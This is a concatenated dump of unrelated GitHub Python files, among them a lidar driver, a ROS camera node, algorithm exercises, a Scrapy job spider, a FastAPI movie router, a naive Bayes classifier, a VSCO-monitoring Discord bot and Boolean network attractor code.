\r\n \r\n \r\n def set_pwm(self, pwm: int) -> None:\r\n \"\"\"Just call this function to start the motor\r\n\r\n Args:\r\n pwm (int): Keep it above 800 pwm\r\n \"\"\"\r\n self.lidar_connection.setDTR(False)\r\n payload = struct.pack(\" Just a read handler\r\n\r\n Args:\r\n bytes (int): Number of bytes\r\n\r\n Returns:\r\n bytesarray\r\n \"\"\"\r\n return self.lidar_connection.read(bytes)\r\n \r\n\r\n\r\n def parse_scan_readings(self,raw:bytes):\r\n\r\n if len(raw)<5:\r\n print(\"Length not enough\")\r\n return -1,0,0\r\n else:\r\n new_scan = bool(raw[0] & 0b1)\r\n inversed_new_scan = bool((raw[0] >> 1) & 0b1)\r\n quality = raw[0] >> 2\r\n if new_scan == inversed_new_scan:\r\n print(\"New scan flags mismatch\")\r\n # self.send_stopscan_request()\r\n self.lidar_connection.flushInput()\r\n \r\n return -1,0,0\r\n else:\r\n angle = ((raw[1] >> 1) + (raw[2] << 7)) / 64.0\r\n distance = (raw[3] + (raw[4] << 8)) / 4.0\r\n return new_scan,angle,distance\r\n\r\n\r\n def _process_scan(self,raw: bytes):\r\n \"\"\"Processes input raw data and returns measurement data\"\"\"\r\n if len(raw)==5:\r\n new_scan = bool(raw[0] & 0b1)\r\n inversed_new_scan = bool((raw[0] >> 1) & 0b1)\r\n quality = raw[0] >> 2\r\n if new_scan == inversed_new_scan:\r\n print(\"New scan flags mismatch\")\r\n return 0,0,0,0\r\n check_bit = raw[1] & 0b1\r\n if check_bit != 1:\r\n print(\"Check bit not equal to 1\")\r\n return 0,0,0,0\r\n \r\n angle = ((raw[1] >> 1) + (raw[2] << 7)) / 64.0\r\n distance = (raw[3] + (raw[4] << 8)) / 4.0\r\n return new_scan, quality, angle, distance","repo_name":"mhrrrr/Phase-1","sub_path":"util/SAADriver.py","file_name":"SAADriver.py","file_ext":"py","file_size_in_byte":15087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72670418980","text":"#!/usr/bin/env python3\n# modified on the basis of https://github.com/duckietown/dt-duckiebot-interface/blob/daffy/packages/camera_driver/src/camera_node.py\n\nimport os\nimport rospy\nimport cv2\nimport atexit\nimport numpy as np\nfrom threading import Thread\n\nfrom duckietown.dtros import DTROS, NodeType\nfrom sensor_msgs.msg import CompressedImage, CameraInfo\nfrom sensor_msgs.srv import SetCameraInfo, SetCameraInfoResponse\nfrom cv_bridge import CvBridge\n\n\nclass CameraPub(DTROS):\n\n def __init__(self, node_name):\n # initialize the DTROS parent class\n super(CameraPub, self).__init__(node_name=node_name, node_type=NodeType.GENERIC)\n # construct publisher\n \n self.pub_img = rospy.Publisher('~image/compressed', \n CompressedImage, \n queue_size=1\n )\n \n # self.pub_camera_info = rospy.Publisher(\n # \"~camera_info\",\n # CameraInfo,\n # queue_size=1\n # ) \n self.value = np.empty((480, 640, 3), dtype=np.uint8)\n self.cap = cv2.VideoCapture(2)\n \n # open camera if not \n if not self.cap.isOpened():\n self.start_camera()\n \n # test if camera opened\n re, image = self.cap.read()\n if not re:\n raise RuntimeError(\"Could not read image from camera.\")\n \n def start_camera(self):\n if not self.cap.isOpened():\n self.cap.open(2)\n\n def stop_camera(self):\n if hasattr(self, 'cap'):\n self.cap.release()\n\n def __del__(self):\n self.stop_camera()\n super(CameraPub, self).__del__()\n\n def run(self):\n \n bridge = CvBridge()\n\n while(1):\n re, image = self.cap.read()\n\n if image is not None:\n image = np.uint8(image)\n \n stamp = rospy.Time.now()\n image_message = bridge.cv2_to_compressed_imgmsg(image, dst_format='jpeg')\n \n #not sure if this actualy does something/ gets published\n image_message.header.stamp = stamp\n image_message.header.frame_id = self.frame_id\n\n #Publish the compressed image\n self.pub_img.publish(image_message)\n\n # # Publish the CameraInfo message \n # self.current_camera_info.header.stamp = stamp\n # self.pub_camera_info.publish(self.current_camera_info)\n rospy.sleep(rospy.Duration.from_sec(0.001))\n\n\n\nif __name__ == '__main__':\n # create the node\n node = CameraPub(node_name='camerapub')\n # run node\n frame_thread = Thread(target=node.run)\n frame_thread.start()\n # keep spinning\n rospy.spin()","repo_name":"SgtVincent/duckietown-exer21-simple-publisher","sub_path":"packages/camera_publisher/src/camerapub.py","file_name":"camerapub.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31398845451","text":"from queue import Queue\n\ndef shortestPath(grid, s):\n m, n = len(grid), len(grid[0])\n path_count = 0\n nodes_left_in_layer = 1\n nodes_in_next_level = 0\n reached_end = False\n visited = [[0 for i in range(n)] for j in range(m)]\n dr = [-1,1,0,0]\n dc = [0,0,1,-1]\n next_nodes = Queue()\n next_nodes.put(s)\n visited[s[0]][s[1]] = True\n while not next_nodes.empty():\n next_node = next_nodes.get()\n print(next_node)\n if grid[next_node[0]][next_node[1]] == 'E':\n reached_end = True\n print(\"in while\")\n break\n print(reached_end)\n for i in range(4):\n rr = next_node[0] + dr[i]\n cc = next_node[1] + dc[i]\n if rr < 0 or cc <0:\n continue\n if rr>=m or cc>=n:\n continue\n if visited[rr][cc]:\n continue\n if grid[rr][cc] == '#':\n continue\n next_nodes.put((rr,cc))\n visited[rr][cc] = True\n nodes_in_next_level += 1\n print(nodes_in_next_level)\n nodes_left_in_layer -= 1\n print(\"left\",nodes_left_in_layer)\n if nodes_left_in_layer == 0:\n nodes_left_in_layer = nodes_in_next_level\n nodes_in_next_level = 0\n path_count+=1\n if reached_end:\n return path_count\n return -1\n\ngrid = [['S', '.', '.', '#', '.', '.', '.'],\n ['.', '#', '.', '.', '.', '#', '.'],\n ['.', '#', '.', '.', '.', '.', '.'],\n ['.', '.', '#', '#', '.', '.', '.'],\n ['#', '.', '#', 'E', '.', '#', '.'],\n ]\n\ngrid1 = [\n ['S', '#', '#'],\n ['.', '#', '#'],\n ['.', 'E', '.']\n]\n\nprint(grid)\nret = shortestPath(grid1, (0,0))\nprint(\"aNSWER\", ret)","repo_name":"nsjethani/Python","sub_path":"DSandALGOs/BFS_shortest_path_grid.py","file_name":"BFS_shortest_path_grid.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71120280100","text":"from __future__ import print_function\nimport simpy\nimport random\nimport sys, os\nfrom statistics import mean\nfrom hwsim_utils import HW_sim_object\nfrom pifo_skip_list import SkipList as SkipList_prob\nfrom det_skip_list_simpy import SkipList as SkipList_det\n\nclass SkipListWrapper(HW_sim_object):\n \n def __init__(self, env, enq_in_pipe, enq_out_pipe, deq_in_pipe, deq_out_pipe, num_sl, period, size, outreg_width, enq_fifo_depth, rd_latency, wr_latency, sl_impl, outreg_latency):\n HW_sim_object.__init__(self, env, period)\n self.num_sl = num_sl\n self.enq_in_pipe = enq_in_pipe\n self.enq_out_pipe = enq_out_pipe\n self.deq_in_pipe = deq_in_pipe\n self.deq_out_pipe = deq_out_pipe\n\n self.sl = []\n self.num_entries = 0\n \n for i in range(num_sl):\n if sl_impl == 'prob':\n sl = SkipList_prob(env, self.period, size, outreg_width, enq_fifo_depth, rd_latency, wr_latency, outreg_latency)\n elif sl_impl == 'det':\n sl = SkipList_det(env, self.period, size, outreg_width, enq_fifo_depth, rd_latency, wr_latency, outreg_latency)\n else:\n print >> sys.stderr, 'ERROR: unsupported skipList implementation type: {}'.format(sl_impl)\n sys.exit(1)\n self.sl.append(sl)\n\n # register processes for simulation\n self.run(env)\n\n def run(self, env):\n self.env.process(self.enqueue())\n self.env.process(self.dequeue())\n\n def enqueue(self):\n while True:\n # wait for enqueue command\n enq_req = yield self.enq_in_pipe.get()\n \n t1 = self.env.now\n # Select the skip list w/ min number of entries among the ready (not busy) skip lists\n sel_sl = None\n while sel_sl == None:\n for i in range(self.num_sl):\n if (self.sl[i].busy == 0 and self.sl[i].outreg.busy == 0):\n if sel_sl == None:\n sel_sl = i\n min_num_entries = self.sl[i].num_entries\n else:\n if self.sl[i].num_entries < min_num_entries:\n sel_sl = i\n min_num_entries = self.sl[i].num_entries\n # All skip lists busy, try again\n if sel_sl == None:\n yield self.env.timeout(self.period)\n # Send enqueue request to selected skip list\n self.sl[sel_sl].enq_in_pipe.put(enq_req)\n yield self.env.timeout(self.period)\n self.num_entries += 1\n self.enq_out_pipe.put(self.env.now - t1)\n\n def dequeue(self):\n while True:\n # wait for dequeue request\n deq_req = yield self.deq_in_pipe.get()\n if self.num_entries > 0:\n self.num_entries -= 1\n else:\n print (\"ERROR: Dequeue from empty PIFO!\")\n continue\n \n t1 = self.env.now\n # From non-empty skip lists/regs, select the one with the min value\n sel_sl = None\n while sel_sl == None:\n for i in range(self.num_sl):\n # Wait until out reg has valid data if there's data in the skip list\n while (self.sl[i].num_entries > 0 and self.sl[i].outreg.next_valid == 0):\n yield self.env.timeout(self.period)\n if self.sl[i].outreg.next_valid == 1:\n if sel_sl == None:\n sel_sl = i\n min_value = self.sl[i].outreg.next\n else:\n if self.sl[i].outreg.next < min_value:\n sel_sl = i\n min_value = self.sl[i].outreg.next\n if sel_sl == None:\n yield self.env.timeout(self.period)\n # Send dequeue request to selected skip list\n self.sl[sel_sl].deq_in_pipe.put(deq_req)\n (deq_val, deq_hsp, deq_mdp, deq_nclks) = yield self.sl[sel_sl].deq_out_pipe.get()\n # Update deq nclks\n deq_nclks = self.env.now - t1\n self.deq_out_pipe.put((deq_val, deq_hsp, deq_mdp, deq_nclks))\n\n","repo_name":"PIFO-TM/PIFO-NetFPGA","sub_path":"sw/python_sims/pifo_wrapper.py","file_name":"pifo_wrapper.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"29514885209","text":"t = int(input())\nfor _ in range(t):\n n = int(input())\n wear = {}\n for _ in range(n):\n name, kind = input().split()\n wear[kind] = wear.get(kind, 0) + 1\n\n result = 1\n for cnt in wear.values():\n result *= (cnt + 1)\n \n result -= 1\n print(result)","repo_name":"yunhlim/TIL","sub_path":"algorithm/Baekjoon/S3_9375/S3_9375.py","file_name":"S3_9375.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8993284092","text":"import numpy as np\n\ndef paths(matrix):\n path=np.zeros(matrix.shape)\n if matrix[0][0]==0:\n path[0][0] =1\n\n # make entry in the first row and column of the path matrix\n for i in range(1,len(matrix)):\n if matrix[i][0]==0:\n path[i][0] = path[i-1][0]\n for i in range(1,len(matrix)):\n if matrix[0][i]==0:\n path[0][i]= path[0][i-1]\n\n for i in range(1,len(matrix)):\n for j in range(1,len(matrix)):\n if matrix[i][j]==0:\n path[i][j] = path[i][j-1] + path[i-1][j]\n\n return path[-1][-1]\n\nmap1 = [[0,0,0],\n [0,1,0],\n [0,0,0]]\nprint(\"The number of paths in the map\", map1, \" \\n is : \",paths(np.asarray(map1)))","repo_name":"nikhilcusc/LearningRepo","sub_path":"CountpathsMatrix.py","file_name":"CountpathsMatrix.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3901633169","text":"#Creating a Pandas DataFrame\nimport pandas as pd\nlst = ['Geeks', 'For', 'Geeks', 'is', 'portal', 'for', 'Geeks']\ndf=pd.DataFrame(lst)\n# print(df)\n\n\n#Creating DataFrame from dict of ndarray/lists\n\ndata = {'Name':['Tom', 'nick', 'krish', 'jack'],'Age':[20, 21, 19, 18]}\ndf=pd.DataFrame(data)\n# print(df)\n\n\n#Dealing with Rows and Columns\n#Selecting Colum to be displayed\n\ndata = {'Name':['Jai', 'Princi', 'Gaurav', 'Anuj'],'Age':[27, 24, 22, 32],'Address':['Delhi', 'Kanpur', 'Allahabad', 'Kannauj'],'Qualification':['Msc', 'MA', 'MCA', 'Phd']}\ndf=pd.DataFrame(data)\n# print(df)\n\n\ndic={\n \"engagedly-services\": \"staging_july_2109\",\n \"enquete\": \"engagedly_UI_revised_staging__config_as_env_var\",\n \"audit-subscriber\": \"staging_july_2109\",\n \"augadh\": \"qa_dec_2019\",\n \"bharga\": \"events_common_branch\",\n \"durjaya\": \"engagedly_UI_revised_staging_config_as_env_var\",\n \"eauth-services\": \"staging_july_2109_config_as_env_var\",\n \"ekaksha\": \"engagedly_UI_revised_staging_config_as_env_var\",\n \"elastic-interface\": \"engagedly_UI_revised_staging_ebm_nov_config_as_env_var\",\n \"engagedly\": \"engagedly_UI_revised_ebm_dec_config_as_env_var\",\n \"faye-server\": \"staging_july_2109\",\n \"advaya\": \"engagedly_UI_revised_staging_config_as_env_var\",\n \"aja\": \"es6_data_push\",\"ananta\": \"develop\",\n \"anmolhrm\": \"engagedly_UI_revised_abhinev_staging_ebm_dec_config_as_env_var\",\n \"api-gateway\": \"staging_july_2109_config_as_env_var\",\n\n\n\n}\nkey_list=list(dic.keys())\nvalue_list=list(dic.values())\n# print(key_list)\n# print(value_list)\ndic={}\ndic[\"application\"]=key_list\ndic[\"branch\"]=value_list\n# print(dic)\ndf=pd.DataFrame(dic)\ndf.sort_values(by=['application'], ascending=True,)\ndf.reset_index(drop=True,inplace=True)\n# print(df)\nrows,column=df.shape\n# print(\" number os rows is \"+ str(rows)+\" \\n\"+ \"number of column is \"+ str(column))\n\n# print(df.head(2))\n# print(df[4:7])\n# print(df.columns)\n# print(df[\"application\"])\n# print(type(df[\"branch\"]))\nprint(df[\"application\"])","repo_name":"Pra9jha/ML","sub_path":"Creating_a_DataFrame.py","file_name":"Creating_a_DataFrame.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1985686134","text":"from collections import defaultdict\nimport itertools as it\nimport time\n\nimport intcomp\n\n\ntiles = {\n 0: \" \",\n 1: \"#\",\n 2: \"¤\",\n 3: \"^\",\n 4: \"o\",\n}\n\nincodes = {\n \"a\": -1,\n \"s\": 0,\n \"d\": 1,\n \"\": 0,\n}\n\n\ndef parse_tile(t):\n pos = t[0] + t[1] * 1j\n return pos, t[2]\n\n\ndef render(universe):\n score = universe[-1]\n print(f\"Score: {score}\")\n max_x = int(max(map(lambda i: i.real, universe)))\n max_y = int(max(map(lambda i: i.imag, universe)))\n\n for y in range(max_y + 1):\n for x in range(max_x + 1):\n print(tiles[universe[x + y * 1j]], end=\"\")\n print()\n\n\ndef super_smart_ai(universe):\n reverse_universe = dict(map(reversed, universe.items()))\n ball = reverse_universe[4]\n paddle = reverse_universe[3]\n\n diff = ball.real - paddle.real\n\n if diff > 0:\n return 1\n if diff < 0:\n return - 1\n return 0\n\n\ndef get_universe(tiles):\n universe = defaultdict(int)\n universe.update(map(parse_tile, zip(*([iter(tiles)] * 3))))\n return universe\n\n\ndef part1():\n program = open(\"in\").read().strip()\n computer = intcomp.Computer()\n computer.run(program)\n tiles = computer.join()\n\n universe = get_universe(tiles)\n\n render(universe)\n\n return len(list(filter(lambda i: i==2, universe.values())))\n\n\ndef part2():\n program = open(\"in\").read().strip()\n program = \"2,\" + program[2:]\n computer = intcomp.Computer()\n computer.run(program)\n\n universe = defaultdict(int)\n time.sleep(1)\n\n while True:\n if not computer.process.is_alive():\n break\n\n time.sleep(0.04)\n tiles = computer.get_all()\n\n universe.update(get_universe(tiles))\n render(universe)\n\n computer.input(super_smart_ai(universe))\n\n\n return len(list(filter(lambda i: i==2, universe.values())))\n\n\nprint(f\"Part 1: {part1()}\")\npart2()\n","repo_name":"netrome/aoc2019","sub_path":"13/m.py","file_name":"m.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"619730954","text":"# -*- coding:utf-8 -*-\nimport scrapy\nfrom job.items import JobItem, DescItem\nimport sys\nimport logging\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n\nclass Job51Spider(scrapy.Spider):\n name = 'job51'\n allowed_domains = ['www.51job.com', 'jobs.51job.com']\n start_urls = [\n 'https://search.51job.com/list/040000%252C030200,000000,0000,00,9,99,%25E6%2595%25B0%25E6%258D%25AE%25E6%258C%2596%25E6%258E%2598,2,{}.html?lang=c&stype=1&postchannel=0000&workyear=99&cotype=99°reefrom=99&jobterm=99&companysize=99&lonlat=0%2C0&radius=-1&ord_field=0&confirmdate=9&fromType=&dibiaoid=0&address=&line=&specialarea=00&from=&welfare='.format(\n i) for i in range(1, 14)]\n\n def parse(self, response):\n node_list = response.xpath(\"//div[@class='el' and not(@id)]\")\n\n for node in node_list:\n item = JobItem()\n\n item[\"position_name\"] = node.xpath(\"./p[@class='t1 ']/span/a/@title\").extract_first()\n item[\"position_link\"] = node.xpath(\"./p[@class='t1 ']/span/a/@href\").extract_first()\n item[\"company_name\"] = node.xpath(\"./span[@class='t2']/a/@title\").extract_first()\n item[\"postiton_pay\"] = node.xpath(\"./span[@class='t4']/text()\").extract_first()\n item[\"work_location\"] = node.xpath(\"./span[@class='t3']/text()\").extract_first()\n item[\"publish_times\"] = node.xpath(\"./span[@class='t5']/text()\").extract_first()\n yield item\n # item 数据交给管道处理(需要自己实现)\n # Request数据交给调度器处理(框架已经实现)\n logging.info(item['position_link'])\n logging.info(type(item['position_link']))\n yield scrapy.Request(item['position_link'], callback=self.parse_page)\n # yield item\n\n def parse_page(self, response):\n item = DescItem()\n # print response\n tl = response.xpath(\"//div[@class='bmsg job_msg inbox']//text()\").extract()\n ts = ''.join(tl)\n logging.info(type(ts))\n ts = ts.replace('\\n', '').replace('\\t', '').strip().split('分享')\n logging.info(ts[0])\n logging.debug('数据类型是:{}'.format(type(ts[0])))\n item[\"position_desc\"] = ts[0]\n logging.info('item是{}'.format(item['position_desc']))\n item[\"position_demand\"] = ''\n yield item\n","repo_name":"alige32/51job-datamining","sub_path":"job/spiders/job51.py","file_name":"job51.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"14356579190","text":"\"\"\"\nPerson router\n\"\"\"\n\nfrom fastapi import APIRouter, HTTPException, Request, Response\nfrom tmdb.tmdb_api import TmdbApi;\n\nrouter = APIRouter(prefix=\"/person\", tags=[\"Person\"])\n\n@router.get(\"/{personId}\")\nasync def getDetails(req: Request, res: Response):\n \"\"\"Gets details of person\"\"\"\n personId = req.path_params['personId']\n \n res = await TmdbApi.person_detail(personId)\n return res\n\n@router.get(\"/{personId}/movies\")\nasync def getMovies(req: Request, res: Response):\n \"\"\"Gets a list of films cast has stared in\"\"\"\n personId = req.path_params['personId']\n \n res = await TmdbApi.person_movies(personId)\n return res\n\n@router.get(\"/search\")\nasync def getSearchResult(req: Request, res: Response):\n \"\"\"Gets search result\"\"\"\n query = req.query_params.get('query')\n page = req.query_params.get('page')\n \n res = await TmdbApi.person_search(query, page)\n\n return res\n","repo_name":"james7089/CM3202-Film-Recommendation-System","sub_path":"web_app/backend/api/api_v1/endpoints/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28313208319","text":"# coding=utf-8\r\n\r\nimport numpy as np\r\n\r\n\r\nclass NaiveBayesian(object):\r\n def __init__(self, alpha):\r\n self.classP = dict()\r\n self.classP_feature = dict()\r\n self.alpha = alpha # 平滑系数\r\n\r\n def createData(self):\r\n data = np.array(\r\n [\r\n [320, 204, 198, 265],\r\n [253, 53, 15, 2243],\r\n [53, 32, 5, 325],\r\n [63, 50, 42, 98],\r\n [1302, 523, 202, 5430],\r\n [32, 22, 5, 143],\r\n [105, 85, 70, 322],\r\n [872, 730, 840, 2762],\r\n [16, 15, 13, 52],\r\n [92, 70, 21, 693],\r\n ]\r\n )\r\n\r\n labels = np.array([1, 0, 0, 1, 0, 0, 1, 1, 1, 0])\r\n return data, labels\r\n\r\n def gaussian(self, mu, sigma, x):\r\n return 1.0 / (sigma * np.sqrt(2 * np.pi)) * np.exp(-(x - mu) ** 2 / (2 * sigma ** 2))\r\n\r\n def calMuAndSigma(self, feature):\r\n mu = np.mean(feature)\r\n sigma = np.std(feature)\r\n return mu, sigma\r\n\r\n def train(self, data, labels):\r\n numData = len(labels)\r\n numFeatures = len(data[0])\r\n\r\n # 是异常用户的概率\r\n self.classP[1] = (\r\n (sum(labels) + self.alpha) * 1.0 / (numData + self.alpha * len(set(labels)))\r\n )\r\n # 不是异常用户的概率\r\n self.classP[0] = 1 - self.classP[1]\r\n\r\n # 用来存放每个label下每个特征标签下对应的高斯分布中的均值和方差\r\n self.classP_feature = dict()\r\n # 遍历每个特征标签\r\n for c in set(labels):\r\n self.classP_feature[c] = {}\r\n for i in range(numFeatures):\r\n # numpy 索引方式\r\n feature = data[np.equal(labels, c), i]\r\n self.classP_feature[c][i] = self.calMuAndSigma(feature)\r\n\r\n def predict(self, x):\r\n # 预测新用户是否为异常用户\r\n label = -1\r\n maxP = 0\r\n\r\n for key in self.classP.keys():\r\n # 计算后验概率\r\n label_p = self.classP[key]\r\n currentP = 1.0\r\n feature_p = self.classP_feature[key]\r\n j = 0\r\n for fp in feature_p.keys():\r\n currentP *= self.gaussian(feature_p[fp][0], feature_p[fp][1], x[j])\r\n j += 1\r\n\r\n if currentP * label_p > maxP:\r\n maxP = currentP * label_p\r\n label = key\r\n\r\n return label\r\n\r\n\r\nif __name__ == \"__main__\":\r\n nb = NaiveBayesian(1.0)\r\n data, labels = nb.createData()\r\n nb.train(data, labels)\r\n labels = nb.predict(np.array([134, 84, 235, 349]))\r\n print(\"未知类型的用户行为数据为:[134,84,235,349],该用户的可能类型为;{}\".format(labels))\r\n","repo_name":"JJXiangJiaoJun/RecommendationSystem","sub_path":"DataMining/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"31102891653","text":"#!/usr/bin/env python3\n\nimport json\nimport locale\nimport sys\nimport emails\nimport reports\nimport os\nfrom datetime import datetime\n\n#will vary\nstudent = os.environ.get('USER')\n#description directory\ndir = r\"/home/{}/supplier-data/descriptions\".format(student)\n\ndef main(argv):\n \"\"\"Process the descriptions and generate a full report out of it. Done in 2 parts\"\"\"\n \n \"\"\"Part 1. Iterate over descriptions dir and generate summary from text files\"\"\"\n summary = \"\"\n for file in os.listdir(dir): # iterate over the dir\n f, e = os.path.splitext(file) # find out the file extension\n if e == \".txt\": # if it's a text file\n with open(os.path.join(dir, file), 'r') as f:\n summary += \"
    \"#line break\n summary += \"name: {}
    \".format(f.readline())\n summary += \"weight: {}
    \".format(f.readline())\n\n \"\"\"Part 2. Generate report\"\"\"\n today = str(datetime.date(datetime.now()))\n reports.generate(\"/tmp/processed.pdf\", \"Processed Update on \"+today, summary)\n\n #send the PDF report as an email attachment\n sender = \"automation@example.com\"\n receiver = \"{}@example.com\".format(student)\n subject = \"Upload Completed - Online Fruit Store\"\n body = 'All fruits are uploaded to our website successfully. A detailed list is attached to this email.'\n message = emails.generate(sender, receiver, subject, body, \"/tmp/processed.pdf\") # creates email\n emails.send(message)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)","repo_name":"earthsoul/Automate-updating-catalog-information-","sub_path":"Generate a PDF report and send it through email.py","file_name":"Generate a PDF report and send it through email.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12229501955","text":"from urllib import response\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport discord\r\nimport asyncio\r\nfrom discord.ext import commands\r\nimport datetime\r\nimport json\r\n\r\nbot = commands.Bot(command_prefix='$')\r\n\r\ns = requests.Session()\r\n\r\nwith open(\"settings.json\") as f:\r\n settings = json.load(f)\r\n\r\nwith open(\"users.json\") as f:\r\n data = json.load(f)\r\n \r\ndef updatejson(user, id):\r\n data[user] = id\r\n with open(\"users.json\", \"w\") as f:\r\n json.dump(data, f, indent=4)\r\n\r\ndef removejson(user):\r\n del data[user]\r\n with open(\"users.json\", \"w\") as f:\r\n json.dump(data, f, indent=4)\r\n \r\n\r\nasync def executeWebhook(username, image_link, id):\r\n embed = discord.Embed(title=f\"{username} just posted! \", color=0xDCD0FF)\r\n embed.add_field(name=\"URLs\", value=f'[Post](https://vsco.co/{username}/media/{id})\\n[Profile](https://vsco.co/{username}/gallery)', inline=False)\r\n embed.set_image(url=image_link)\r\n embed.set_footer(text=f\"{datetime.datetime.now()}\")\r\n channel = bot.get_channel(int(settings[\"monitor_channel\"]))\r\n\r\n await channel.send(embed=embed)\r\n\r\nheaders = {\r\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"accept-encoding\": \"gzip, deflate, br\",\r\n \"cache-control\": \"max-age=0\",\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\",\r\n \"sec-ch-ua\": '\".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"'\r\n}\r\n\r\nasync def getting_recent():\r\n print(f'Fetching Recent Posts | {time.time()}')\r\n for entry in data:\r\n response = s.get(\r\n f'https://vsco.co/{entry}/gallery', \r\n headers=headers\r\n )\r\n\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n # get the value inside of the tag with the attribute property=\"og:image\"\r\n image_url = soup.find('meta', property='og:image')['content']\r\n id = image_url.split('/')[-2]\r\n \r\n #checking if the most recent post ID matches the last ID that the bot fetched\r\n\r\n if data[entry] == \"null\":\r\n updatejson(entry, id)\r\n await executeWebhook(entry, image_url, id)\r\n else:\r\n if data[entry] != id:\r\n updatejson(entry, id)\r\n await executeWebhook(entry, image_url, id)\r\n print(f\"Fetching {entry} | {time.time()}\")\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(f'Logged in as {bot.user.name}')\r\n while True:\r\n await getting_recent()\r\n await asyncio.sleep(5)\r\n\r\n@bot.command()\r\nasync def addprofile(ctx, arg):\r\n #adding profile to users.json for bot to loop through\r\n updatejson(arg, \"null\")\r\n await ctx.send(f'{arg} has been added to the database!')\r\n\r\n@bot.command()\r\nasync def removeprofile(ctx, arg):\r\n removejson(arg)\r\n await ctx.send(f'{arg} has been removed from the database!')\r\n\r\n@bot.command()\r\nasync def profiles(ctx):\r\n #listing all usernames in users.json\r\n await ctx.send('\\n'.join([x for x in data]))\r\n\r\nbot.run(settings[\"bot_token\"])","repo_name":"nunihalawi/discord-vsco-monitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71744676902","text":"from python_files import BooleanNets as bn\nfrom python_files import EntropyMeasures as em\nimport numpy as np\nimport networkx as nx\nimport dit\nfrom itertools import product, combinations\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import AutoMinorLocator\n\n\ndef tup2str(tup): \n ''' Converts a tuple to a string to make labels for the statespace graph'''\n string = ''\n for t in tup: \n string += str(t)\n \n return string\n\ndef generate_positions(Graph,radius = 1): \n\n pos = {}\n N = len(Graph.nodes)\n for n, nodeID in enumerate(Graph.nodes): \n alpha = 2*np.pi*n/float(N)\n pos[nodeID] = np.array([radius*np.cos(alpha), radius*np.sin(alpha)])\n\n return pos\n\n\n\n\n#=============================================================================\n# ATTRACTOR FUNCTIONS\n#=============================================================================\n\ndef update_to_attractor(Net, start_vals = []): \n ''' Updates a Boolean network until it hits an attractor and returns the resulting update sequence, \n can either start from the networks current state or explicitly specify a start value'''\n \n if len(start_vals)!=0: \n Net.assign_values_to_nodes(value_list=start_vals)\n update_seq = []\n stop = False\n while not stop: \n update_seq.append(tuple(Net.CurrentValues.values()))\n Net.update_all()\n \n if len(update_seq) > len(list(set(update_seq))): \n stop = True\n return update_seq\n\n\n\ndef identify_attactors(Net): \n ''' finds the attractors of a boolean network by recursively removing all nodes without parents i.e \n all states that cannot be reached from other states.'''\n \n done = False \n start, stop = Net.calc_all_updates()\n start = [tuple(s) for s in start]\n stop = [tuple(s) for s in stop]\n \n while not done: \n \n attr_start = []\n attr_stop = []\n\n for state_idx, state in enumerate(start): \n if state in stop: \n attr_start.append(state)\n attr_stop.append(stop[state_idx])\n\n if len(list(set(attr_start))) == len(list(set(attr_stop))): \n done =True\n else: \n start = attr_start\n stop = attr_stop\n\n return attr_start, attr_stop\n\n\ndef find_basins_of_attraction(Net, verbose=False):\n \n '''Finds the basin of attraction for each attractor by recursively traversing all incoming states. \n Returns a dictionary where the keys are the attractors and the values are lists of incoming states.'''\n \n #make attractor list\n cycles = Net.scan_state_space()\n start, stop = Net.calc_all_updates()\n start = [tuple(s) for s in start]\n stop = [tuple(s) for s in stop]\n attractors = []\n\n for length in cycles.keys(): \n if length==0: \n for attractor in cycles[length]: \n attractors.append((length, attractor[0]))\n else: \n for attractor in cycles[length]: \n print(attractor)\n attractors.append((length, attractor[0]))\n \n \n # find basin of attraction for each attractor\n Basins = {}\n for attractor in attractors: \n done = False\n Basin = [] # list of elements in the basin of attraction\n Inters = [attractor[1]] # each attractor is itsef a member of its basin of attraction\n \n\n while not done: \n # add the parents of each node in the basin \n inter_val = Inters[0]\n indices = [i for i, x in enumerate(stop) if x == inter_val]\n\n if len(indices) > 0: \n parents = [start[i] for i in 